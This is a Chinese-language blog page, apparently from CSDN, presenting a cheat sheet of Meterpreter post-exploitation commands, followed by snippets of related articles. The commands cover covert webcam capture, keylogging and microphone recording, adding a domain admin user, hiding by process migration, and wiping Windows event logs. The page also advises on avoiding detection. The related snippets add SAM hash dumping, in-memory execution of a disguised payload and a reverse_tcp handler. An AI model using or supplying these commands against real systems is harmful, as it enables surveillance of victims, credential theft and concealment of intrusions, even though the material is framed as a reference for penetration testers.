Meterpreter后渗透模块命令字典

最新推荐文章于 2024-06-14 12:06:36 发布
最新推荐文章于 2024-06-14 12:06:36 发布
阅读量840 收藏 9
点赞数
分类专栏: 工具手册 文章标签: shell 渗透测试 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_57221101/article/details/124184166
版权
本文详细介绍了Meterpreter后渗透阶段的各种操作,包括系统命令、文件操作、网络操作、信息收集、提权和后门植入,如快捷操作、端口转发、抓取密码hash、注册表后门等,是渗透测试人员的重要参考资料。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.系统命令

1.快捷操作

此板块用于记录用于操作meterpreter的指令

sessions    #查看全部会话 –h 查看帮助
sessions -i <shell ID>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息

2.基础系统命令

getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
add_user username password -h ip    #在远程目标主机上添加一个用户

add_group_user "Domain Admins" username -h ip    #将用户添加到目标主机的域管理员组中

3.外设操作

用于操作目标机外设来实现一些迷惑操作

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频,不要开启流,非常容易被抓到
keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录
record_mic    #音频录制

4.隐藏痕迹

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
kill <pid值>   #杀死进程
clearav  #清除windows中的应用程序日志、系统日志、安全日志

5.远程桌面

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接,只可以看

# 不推荐连接远程桌面,非要连用vnc,不要用getgui
run getgui –h #查看帮助 
run getgui -e #开启远程桌面
最低0.47元/天 解锁文章
如何黑掉一个宇宙?一文带你详解Meterpreter渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 2052
如何黑掉一个宇宙?一文带你详解Meterpreter渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
Excel宏反弹shell+BT渗透常用命令+c
m0_60894143的博客
08-21 560
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码。samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件。cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上。
渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 9556
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
Meterpreter(后渗透命令)笔记
5L2g556F5ZWl77yf
02-17 2120
Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。 background命令 如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。 se...
渗透meterpreter使用攻略
xj28555的博客
08-10 2283
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚
meterpreter模块之后渗透攻击实战总结
MX的博客
10-11 1万+
meterpreter模块之后渗透攻击 文章目录meterpreter模块之后渗透攻击一:进程迁移二:系统命令1:查看系统信息2:查看目标主机运行时间3:查看当前主机用户名及其权限4:查看完整网络设置路由信息5:关闭杀毒软件6:启动目标主机的3389端口即远程桌面协议7:将当前会话放到后台8:端口转发9:添加用户10:添加路由(先使用background将meterpreter终端放到后台)11:...
Metasploit后渗透模块开发-三米前有蕉皮1
08-03
《Metasploit后渗透模块开发详解》 Metasploit,作为一个强大的安全测试框架,其后渗透模块的开发对于渗透测试人员来说是一项至关重要的技能。本文将深入探讨如何为Metasploit开发后渗透模块,以及如何将传统的...
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
Metasploit渗透测试之信息收集(三)
qq_63831588的博客
06-14 1038
基于ssh协议收集信息,ssh暴力破解,基于ftp协议收集信息,ftp匿名登陆,ftp暴力破解
Metasploit后渗透命令大全讲解——超详细
渗透测试
05-14 4357
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
msf命令
qq_52469895的博客
05-19 2510
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
渗透攻击命令模块
Cwillchris的博客
04-12 1498
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 1907
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4673
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2383
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
使用msfconsole实现网段端口扫描
weixin_44053218的博客
09-06 2844
msfconsole实现网段端口扫描 在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本 使用portscan模块进行局域网IP搜索 使用use命令进行syn扫描 然后我们可以使用showo ptions显示相关需要配置的信息 注:在Required中显示no的才是我们需要设置的信息,其他yes的是可以不用设置的,当然,你看得懂设置也行 下面进行set赋值 扫描结果 Ct...
kali常用的渗透测试工具
最新发布
02-27
### Kali Linux 常用渗透测试工具 #### 一、信息收集类 - **Nmap** 用于网络发现和安全审计,能够扫描大型网络中的主机和服务。其灵活性使得它成为网络安全专家不可或缺的工具之一[^2]。 ```bash nmap -sS -O scanme.nmap.org ``` - **theHarvester** 可以从多个公共搜索引擎和其他数据源获取电子邮件地址以及子域名等信息,有助于构建目标组织的信息库。 #### 二、漏洞分析类 - **OpenVAS** 提供全面的安全漏洞评估解决方案,支持自动化的脆弱性检测流程,并能生成详细的报告来帮助管理员理解潜在风险所在。 - **Nessus** 同样是一款强大的漏洞扫描器,除了基本功能外还具备Web应用程序安全性检查等功能,在企业级环境中广泛应用。 #### 三、密码破解类 - **John the Ripper** 一种快速有效的口令破解软件,适用于多种加密算法下的离线字典攻击场景;对于弱密码防护有着显著效果。 - **Hashcat** 当前最先进且速度最快的GPU加速型哈希值解密程序之一,兼容超过数百种不同的散列类型,是处理复杂度较高场合下首选方案。 #### 四、利用工具类 - **Metasploit Framework** 作为一款模块化设计的支持插件扩展架构的安全漏洞研究平台,不仅限于简单的payload投递操作,更强调整个过程链路的设计与实现,包括但不限于前期情报搜集到最后阶段权限维持等方面的工作[^3]。 ```ruby use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp run ``` #### 五、无线攻击类 - **Aircrack-ng** 专为802.11 WEP/WPA/WPA2 加密协议而生的一套完整的Wi-Fi 安全测试套装,内含监听模式抓包、注入伪造帧等多种实用特性,广泛应用于无线网络安全领域内的攻防演练活动中。 #### 六、网站应用测试类 - **OWASP ZAP (Zed Attack Proxy)** 由OWASP 组织维护的一个易于使用的集成环境,旨在协助开发者找到存在于web 应用里的安全隐患之处,通过代理流量的方式拦截请求响应对交互细节进行全面审查。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值